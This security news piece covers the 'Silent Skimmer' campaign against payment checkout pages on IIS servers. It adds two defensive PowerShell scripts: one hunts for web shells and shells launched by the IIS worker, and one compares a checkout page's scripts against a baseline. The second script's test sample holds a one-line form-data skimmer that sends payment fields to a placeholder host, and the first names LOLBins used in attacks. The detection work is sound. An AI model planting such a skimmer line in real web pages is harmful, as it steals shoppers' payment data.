A financially motivated campaign has been persistently targeting online payment enterprises across the Asia Pacific, North America, and Latin America for over a year.
The research and intelligence team at BlackBerry has been closely monitoring this operation, codenamed “Silent Skimmer,” and attributes it to a Chinese-speaking threat actor.
Victim Alert: Online businesses and providers of point-of-sale (PoS) services.
Modus Operandi of Threat Actors
- Exploiting vulnerabilities within web applications, particularly those hosted on Internet Information Services (IIS).
- Their primary objective is compromising the payment checkout page, enabling them to acquire sensitive payment data from visitors.
- Upon successfully establishing an initial foothold, the threat actors employ open-source tools and “living-off-the-land” (LotL) techniques for privilege escalation, post-exploitation activities, and code execution.
- The attack chain culminates in deploying a PowerShell-based remote access trojan (server.ps1).
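The chain above leaves two artifacts a defender can look for on an IIS host: a server-side file (web shell, dropped script) that the application did not ship with, and the IIS worker process `w3wp.exe` spawning PowerShell or another living-off-the-land binary. The following triage script is an added example written for this page, not code from BlackBerry's report; the lookback window, extension list and binary list are assumptions to tune, and the process-lineage check needs process-creation auditing (Security event 4688, with command-line logging enabled) on the host.

```powershell
# Added example (not from the report): triage an IIS host for the two footholds
# this campaign relies on. Run elevated on the web server (or, better, from a
# forensic copy). Thresholds and lists below are assumptions; tune per environment.
Import-Module WebAdministration -ErrorAction Stop

$LookbackDays = 14
$SuspectExts  = '.aspx', '.ashx', '.asmx', '.asp', '.ps1', '.bat', '.cmd', '.exe', '.dll'
$since        = (Get-Date).AddDays(-$LookbackDays)

# 1) Recently written server-side files under every IIS site root.
#    A web shell or checkout-page scraper is a file the deployment did not contain,
#    so "new or modified since the last release" is the cheapest first filter.
$roots = Get-Website | ForEach-Object {
    [Environment]::ExpandEnvironmentVariables($_.physicalPath)
} | Sort-Object -Unique

$recentFiles = foreach ($root in $roots) {
    if (-not (Test-Path $root)) { continue }
    Get-ChildItem -Path $root -Recurse -File -ErrorAction SilentlyContinue |
        Where-Object { $_.LastWriteTime -gt $since -and $SuspectExts -contains $_.Extension.ToLower() } |
        Select-Object FullName, Length, LastWriteTime,
            @{ n = 'Owner';  e = { (Get-Acl $_.FullName).Owner } },
            @{ n = 'SHA256'; e = { (Get-FileHash $_.FullName -Algorithm SHA256).Hash } }
}

# 2) The IIS worker (w3wp.exe) starting a shell or a LOLBin. Legitimate web apps
#    almost never do this; a web shell executing commands always does.
$lolbins = 'powershell.exe', 'pwsh.exe', 'cmd.exe', 'certutil.exe', 'bitsadmin.exe', 'mshta.exe', 'rundll32.exe'
$events  = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $since } -ErrorAction SilentlyContinue

$suspectProcs = foreach ($e in $events) {
    # Read the named EventData fields from the event XML rather than relying on
    # positional Properties indices, which differ between Windows versions.
    $data   = ([xml]$e.ToXml()).Event.EventData.Data
    $parent = ($data | Where-Object Name -eq 'ParentProcessName').'#text'
    $child  = ($data | Where-Object Name -eq 'NewProcessName').'#text'
    if ($parent -and $child -and
        $parent.ToLower().EndsWith('\w3wp.exe') -and
        $lolbins -contains [IO.Path]::GetFileName($child).ToLower()) {
        [pscustomobject]@{
            Time        = $e.TimeCreated
            Parent      = $parent
            Child       = $child
            CommandLine = ($data | Where-Object Name -eq 'CommandLine').'#text'
        }
    }
}

"== Server-side files modified under IIS roots in the last $LookbackDays days =="
$recentFiles  | Format-Table -AutoSize
"== Shells/LOLBins spawned by w3wp.exe =="
$suspectProcs | Format-Table -AutoSize
```

Any hit in the second list is worth an incident ticket on its own; hits in the first list should be compared against the last known deployment manifest before being dismissed.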
What does the Trojan do?
The trojan gives the attackers remote control of the compromised host, which then connects to an attacker-controlled server hosting additional tooling, including downloader scripts, reverse proxies, and Cobalt Strike beacons.
What might be the motive?
The ultimate objective of this intrusion, as discussed by BlackBerry, is to infiltrate the web server and introduce a scraper into the payment checkout service using a web shell.
This allows them to secretly capture financial information entered by victims on the payment page.
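Because the scraper is injected into the checkout page itself, the most direct control is to compare the page's script inventory against a baseline captured after a trusted deployment: external scripts are identified by their `src`, inline scripts by a hash of their body. The script below is an added example for this page, not code from the report; the HTML samples are constructed, the injected snippet is a hypothetical illustration of a form-capturing skimmer rather than this campaign's actual code, and the `<script>` extraction uses a deliberately simple regex. Run the check from a monitoring host, not from the web server, since the server is the thing assumed to be compromised.

```powershell
# Added example (not from the report): detect a script injected into a checkout
# page by diffing its <script> inventory against a known-good baseline.

function Get-ScriptInventory {
    param([Parameter(Mandatory)][string]$Html)
    $sha = [System.Security.Cryptography.SHA256]::Create()
    foreach ($m in [regex]::Matches($Html, '<script\b([^>]*)>(.*?)</script>', 'IgnoreCase, Singleline')) {
        $attrs = $m.Groups[1].Value
        $src   = [regex]::Match($attrs, 'src\s*=\s*["'']([^"'']+)["'']', 'IgnoreCase')
        if ($src.Success) {
            # External script: identified by its URL.
            'src:' + $src.Groups[1].Value.Trim()
        } else {
            # Inline script: identified by the SHA-256 of its whitespace-normalised body.
            $body = ($m.Groups[2].Value -replace '\s+', ' ').Trim()
            $hash = ($sha.ComputeHash([Text.Encoding]::UTF8.GetBytes($body)) |
                     ForEach-Object { $_.ToString('x2') }) -join ''
            "inline:sha256:$hash"
        }
    }
}

function Compare-CheckoutScripts {
    param([string[]]$Baseline, [Parameter(Mandatory)][string]$Html)
    $current = @(Get-ScriptInventory -Html $Html)
    [pscustomobject]@{
        Unexpected = @($current  | Where-Object { $Baseline -notcontains $_ })   # injected
        Missing    = @($Baseline | Where-Object { $current  -notcontains $_ })   # removed/replaced
    }
}

# Constructed sample: the checkout page as deployed.
$knownGood = @'
<html><head>
<script src="/static/checkout.js"></script>
<script>window.cfg = { currency: "USD" };</script>
</head><body>...</body></html>
'@

# Constructed sample: the same page with a hypothetical skimmer appended. The
# snippet posts serialised form fields to an attacker host on submit; it is an
# illustration of the technique, not this campaign's code.
$tampered = @'
<html><head>
<script src="/static/checkout.js"></script>
<script>window.cfg = { currency: "USD" };</script>
<script>document.forms[0].addEventListener('submit',function(){new Image().src='https://example.invalid/c?'+btoa(JSON.stringify(Object.fromEntries(new FormData(this))))});</script>
</head><body>...</body></html>
'@

$baseline = @(Get-ScriptInventory -Html $knownGood)   # capture once, after a trusted deploy
$result   = Compare-CheckoutScripts -Baseline $baseline -Html $tampered

if ($result.Unexpected.Count) { 'ALERT: unexpected script(s) on checkout page:'; $result.Unexpected }
if ($result.Missing.Count)    { 'WARN: baseline script(s) missing:';             $result.Missing }
```

With the samples above the check reports one unexpected `inline:sha256:...` entry and nothing missing. In production the baseline would be regenerated as part of each release, and the fetched page would come from the public endpoint so that the comparison also catches changes made at the web-server layer rather than in the source repository.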
Examining the adversary’s infrastructure reveals a deliberate effort to select virtual private servers (VPS) for command-and-control (C2) based on the geolocation of victims, aiming to evade detection.
The diversity of industries and regions targeted, along with the type of servers breached, suggests that this campaign leans more towards an opportunistic approach rather than a highly deliberate and targeted one.
“The attacker primarily focuses on regional websites that gather payment data, leveraging vulnerabilities in commonly used technologies to gain unauthorized access and extract sensitive payment information either entered into or stored on the site,” noted BlackBerry.
Are you 360 degrees Secure?
Rising threats, advanced malware and sophisticated tactics are what defenders have to deal with today, and this campaign puts server hardening at the top of the list.
Unpatched, internet-exposed servers are attractive targets for data theft.
The Silent Skimmer campaign has shown how easily vulnerable IIS servers can be compromised and abused. According to BlackBerry, more such attacks can be expected in the future, including in new regions.